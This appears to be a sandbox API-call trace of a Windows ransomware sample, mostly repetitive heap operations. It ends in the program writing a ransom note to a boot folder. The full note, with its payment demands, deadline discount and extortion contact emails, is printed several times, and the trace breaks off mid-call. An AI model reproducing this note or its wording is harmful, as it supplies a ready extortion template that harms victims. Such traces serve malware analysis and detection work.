RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.688] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0174.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.688] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.688] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.688] PathFindFileNameW (pszPath="") returned="" [0174.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.688] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.689] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.689] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.689] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.690] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0174.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.690] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0174.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.690] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.690] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.691] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.692] FindFirstFileW (in: 